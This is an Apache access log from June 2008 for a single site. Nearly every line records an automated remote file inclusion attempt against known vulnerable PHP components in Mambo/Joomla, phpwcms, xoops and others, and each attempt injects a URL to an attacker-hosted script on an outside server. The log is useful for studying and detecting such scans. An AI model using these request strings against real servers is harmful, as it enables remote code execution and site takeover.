207.114.88.90 - - [24/Jun/2008:12:01:40 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:01:40 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:01:49 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:01:53 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.34.160.226 - - [24/Jun/2008:12:01:55 -0700] "GET /logs/access_080118.log/index.php?url=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:01:56 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:01:56 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:01:57 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:01:57 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:02:04 -0700] "GET /logs/access_071229.log//include/write.php?dir=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:02:06 -0700] "GET /logs/access_080104.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.47.9.2 - - [24/Jun/2008:12:02:08 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.47.9.2 - - [24/Jun/2008:12:02:09 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
195.47.9.2 - - [24/Jun/2008:12:02:09 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [24/Jun/2008:12:02:14 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:12:02:15 -0700] "GET /logs/home.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:12:02:15 -0700] "GET /home.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.12.244.192 - - [24/Jun/2008:12:02:15 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [24/Jun/2008:12:02:15 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:02:16 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:12:02:18 -0700] "GET /logs/home.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:12:02:18 -0700] "GET /home.php?content=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:02:19 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18547 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:12:02:20 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:12:02:28 -0700] "GET /avatar.php?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.51.131.109 - - [24/Jun/2008:12:02:36 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.131.109 - - [24/Jun/2008:12:02:37 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.131.109 - - [24/Jun/2008:12:02:38 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:02:38 -0700] "GET /logs/access.log//errors.php?error=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:02:39 -0700] "GET //errors.php?error=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:02:39 -0700] "GET /logs//errors.php?error=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.20.46.121 - - [24/Jun/2008:12:02:44 -0700] "GET /logs/access_071223.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:12:03:28 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [24/Jun/2008:12:04:00 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [24/Jun/2008:12:04:00 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.252.3.200 - - [24/Jun/2008:12:04:05 -0700] "GET /logs/access_080423.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:04:09 -0700] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:04:09 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:04:09 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:04:40 -0700] "GET /logs/access.log//index.php?id=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:04:41 -0700] "GET /logs/access_080104.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:04:42 -0700] "GET //index.php?id=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 200 18525 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.137.141 - - [24/Jun/2008:12:04:42 -0700] "GET /logs//index.php?id=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:05:12 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:05:12 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:05:20 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.114.88.90 - - [24/Jun/2008:12:05:21 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.58.108.200 - - [24/Jun/2008:12:05:34 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.58.108.200 - - [24/Jun/2008:12:05:35 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
62.58.108.200 - - [24/Jun/2008:12:05:36 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:06:05 -0700] "GET /logs//core/core.php?root=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.178.146 - - [24/Jun/2008:12:06:05 -0700] "GET //core/core.php?root=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.35.225.138 - - [24/Jun/2008:12:06:36 -0700] "GET /logs/access_080312.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.35.225.138 - - [24/Jun/2008:12:06:36 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.35.225.138 - - [24/Jun/2008:12:06:37 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.168.76.155 - - [24/Jun/2008:12:06:58 -0700] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.20.5.26 - - [24/Jun/2008:12:06:58 -0700] "GET /logs/access_080304.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.35.225.138 - - [24/Jun/2008:12:07:07 -0700] "GET /logs/access_080312.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.35.225.138 - - [24/Jun/2008:12:07:08 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.35.225.138 - - [24/Jun/2008:12:07:08 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.35.225.138 - - [24/Jun/2008:12:07:23 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:12:07:25 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.118.156 - - [24/Jun/2008:12:07:25 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:12:07:34 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:12:07:34 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:12:07:34 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:12:07:40 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:12:07:40 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:12:07:40 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:07:44 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:07:44 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.35.225.138 - - [24/Jun/2008:12:07:47 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:12:07:48 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:12:07:50 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.78.110.72 - - [24/Jun/2008:12:07:53 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://skill-station.net/help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [24/Jun/2008:12:08:02 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.34.140.215 - - [24/Jun/2008:12:08:03 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [24/Jun/2008:12:08:03 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.94.120.198 - - [24/Jun/2008:12:08:41 -0700] "GET /logs/access_080304.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.228.221 - - [24/Jun/2008:12:08:52 -0700] "GET /logs/access_080304.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:09:01 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:09:02 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:09:02 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:23 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:23 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:24 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:24 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:25 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:25 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:25 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:25 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:26 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.194.178 - - [24/Jun/2008:12:09:28 -0700] "GET /logs/access_080101.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:35 -0700] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mx-skane.net//cache/xml/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:35 -0700] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.46.202 - - [24/Jun/2008:12:09:36 -0700] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:12:09:37 -0700] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:09:39 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.96.139.60 - - [24/Jun/2008:12:09:40 -0700] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
196.40.71.237 - - [24/Jun/2008:12:10:02 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
196.40.71.237 - - [24/Jun/2008:12:10:03 -0700] "GET //index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.69" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:12:10:03 -0700] "GET /logs/access_080201.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.40.71.237 - - [24/Jun/2008:12:10:03 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:12:10:04 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:12:10:04 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:12:10:09 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
